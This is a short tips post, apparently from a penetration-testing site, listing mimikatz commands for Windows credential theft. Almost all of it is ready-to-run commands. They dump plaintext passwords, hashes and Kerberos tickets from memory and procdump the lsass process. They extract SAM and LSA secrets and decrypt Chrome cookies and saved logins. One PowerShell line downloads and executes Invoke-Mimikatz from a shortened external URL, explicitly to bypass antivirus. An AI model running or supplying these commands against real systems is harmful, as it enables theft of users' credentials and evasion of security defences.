[Tips] Using mimikataz on penetration testing

mimikatz is a tool I’ve made to learn C and make somes experiments with Windows security.

It’s now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.

Print mimikatz implementation process log
mimikatz.exe ""privilege::debug"" ""log sekurlsa::logonpasswords full"" exit && dir

Read the password exported in mimikatz directory

mimikatz.exe ""privilege::debug"" ""sekurlsa::logonpasswords full"" exit >> log.txt

Use powershell to bypass AV

powershell "IEX (New-Object Net.WebClient).DownloadString('http://is.gd/oeoFuI'); Invoke-Mimikatz -DumpCreds"

procdump lsass process export

C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp //For 32 bits
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp //For 64 bits
sekurlsa::minidump lsass.dmp
sekurlsa::logonPasswords full
Get the vpn password
mimikatz.exe privilege::debug token::elevate lsadump::sam lsadump::secrets exit

Get the Browser password

mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\cookies /unprotect" exit
mimikatz.exe privilege::debug log "dpapi::chrome /in:%localappdata%\google\chrome\USERDA~1\default\LOGIND~1" exit